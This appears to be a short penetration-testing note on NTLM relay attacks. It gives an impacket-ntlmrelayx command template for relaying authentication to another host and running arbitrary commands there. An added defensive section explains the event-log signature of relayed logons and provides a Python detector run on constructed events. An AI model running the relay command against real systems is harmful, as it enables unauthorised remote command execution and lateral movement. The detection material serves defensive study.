Relay Attack

If we are unable to crack the NTLM hash, we can try to relay the authentication to another system instead. A user on one machine might be a local administrator on another. If so, we can run commands on that machine (no UAC confirmation required).

sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"
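
Seen from the target's logs, a relayed logon is an NTLM network logon (event 4624, logon type 3) in which WorkstationName, taken from the client's NTLM message, names the original machine while IpAddress is the relaying host. The following is an added example, not part of the original page, that flags this mismatch; the inventory, host names, addresses and events are all constructed.

```python
# Constructed inventory (assumption): hostname -> addresses that host is expected to use.
INVENTORY = {"WS-ALICE": {"10.0.0.21"}, "WS-BOB": {"10.0.0.22"}}

def ev(user, workstation, ip, target, package="NTLM", logon_type=3):
    """Build a constructed 4624 record reduced to the fields the check reads."""
    return {"EventID": 4624, "LogonType": logon_type,
            "AuthenticationPackageName": package, "TargetUserName": user,
            "WorkstationName": workstation, "IpAddress": ip, "Computer": target}

# Constructed sample events, not taken from a real environment.
SAMPLE_EVENTS = [
    ev("alice", "WS-ALICE", "10.0.0.21", "SRV-FILES"),          # direct NTLM logon
    ev("alice", "WS-ALICE", "10.0.0.66", "SRV-DB"),             # name and address disagree
    ev("bob", "-", "10.0.0.22", "SRV-DB", package="Kerberos"),  # not NTLM, ignored
    ev("bob", "WS-BOB", "127.0.0.1", "WS-BOB", logon_type=2),   # interactive, ignored
    ev("carol", "WS-LAB7", "10.0.0.90", "SRV-DB"),              # host not in inventory
]

def find_relay_candidates(events, inventory):
    """Return (findings, unknown_hosts) for NTLM network logons.

    A finding is a logon whose claimed workstation is known but does not own
    the source address; unknown_hosts lists names the inventory cannot judge.
    """
    findings, unknown = [], set()
    for e in events:
        if (e.get("EventID"), e.get("LogonType")) != (4624, 3):
            continue
        if e.get("AuthenticationPackageName") != "NTLM":
            continue
        name = (e.get("WorkstationName") or "").upper()
        src = e.get("IpAddress") or "-"
        if name in ("", "-") or src in ("-", "127.0.0.1", "::1"):
            continue  # nothing to compare
        if name not in inventory:
            unknown.add(name)
        elif src not in inventory[name]:
            findings.append({"user": e["TargetUserName"], "claimed": name,
                             "source": src, "target": e["Computer"]})
    return findings, sorted(unknown)

if __name__ == "__main__":
    hits, unknown = find_relay_candidates(SAMPLE_EVENTS, INVENTORY)
    for h in hits:
        print("possible relay:", h)
    print("hosts missing from inventory:", unknown)
```

A finding is a lead to investigate rather than proof: NAT, VPN pools and stale inventory entries produce the same mismatch.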
